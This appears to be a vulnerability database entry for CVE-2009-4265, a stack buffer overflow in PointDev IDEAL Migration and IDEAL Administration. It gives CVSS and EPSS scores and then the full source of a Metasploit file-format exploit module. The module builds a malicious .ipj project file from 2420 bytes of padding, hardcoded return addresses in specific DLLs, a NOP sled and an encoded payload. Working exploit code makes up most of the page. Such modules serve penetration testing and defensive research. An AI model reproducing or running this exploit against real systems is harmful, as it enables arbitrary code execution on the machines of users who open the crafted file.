Lucene search

Dr_IDE, dookie, jduck <[email protected]>MSF:EXPLOIT-WINDOWS-FILEFORMAT-IDEAL_MIGRATION_IPJ-

HistoryMay 10, 2010 - 11:08 p.m.

PointDev IDEAL Migration Buffer Overflow

2010-05-1023:08:36

Dr_IDE, dookie, jduck <[email protected]>

www.rapid7.com

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS

0.958

Percentile

99.5%

JSON

This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PointDev IDEAL Migration Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in versions v9.7
        through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
        IDEAL Migration. All versions are suspected to be vulnerable.
        By creating a specially crafted ipj file, an attacker may be able
        to execute arbitrary code.

        NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Dr_IDE', 'dookie', 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-4265' ],
          [ 'OSVDB', '60681' ],
          [ 'EDB', '10319' ],
          [ 'EDB', '12403' ],
          [ 'EDB', '12404' ],
          [ 'EDB', '12540' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00\x0a\x1a\x22\x3c\x3e",
          'StackAdjustment' => -3500,
          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'IDEAL Migration <= 4.5.1 on Windows XP',
            {
              'Ret' => 0x1001411e # CALL EBP in ULMigration_us.dll
              # 'Ret' => 0x7c96bf33 # JMP ESP in ULMigration_us.dll (from Blake)
              # 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
            }
          ],

          [ 'IDEAL Administration <= 10.5 on Windows XP',
            {
              'Ret' => 0x10010F2E # CALL EBP in ListWmi.dll
              # 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-12-05',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.ipj']),
      ])
  end

  def exploit

    ipj = "\r\n"
    ipj << "[Group,Export,Yes]\r\n"
    ipj << "Computer="

    sploit = ""
    sploit << rand_text_alpha_upper(2420)
    sploit << [target.ret].pack('V')
    # These nops are required to move the payload below where ebp points
    # when returning...
    sploit << make_nops(768)
    sploit << payload.encoded

    ipj << sploit
    ipj << "\r\n"
    ipj << "[End]\r\n"

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(ipj)

  end
end